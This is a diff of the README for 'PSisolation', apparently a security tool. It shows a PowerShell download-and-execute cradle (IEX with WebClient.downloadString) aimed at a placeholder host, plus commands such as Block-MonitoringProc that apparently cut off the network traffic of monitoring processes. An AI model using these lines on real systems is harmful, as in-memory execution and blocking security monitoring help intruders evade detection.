y00ga-sec/PSisolation/README.md

 ## Getting Started

-Import the script in memory from a remote HTTP server ``
+- Import the script in memory from a remote HTTP server

-IEX(New-Object Net.WebClient).downloadString('http://xxx.xxx.xxx/PSisolation.ps1')
-``
+``IEX(New-Object Net.WebClient).downloadString('http://xxx.xxx.xxx/PSisolation.ps1')``

+- Block outgoing traffic by running directly

+``Block-MonitoringProc``

+or a specific process you want with :

+``Block-SpecificProcessTraffic``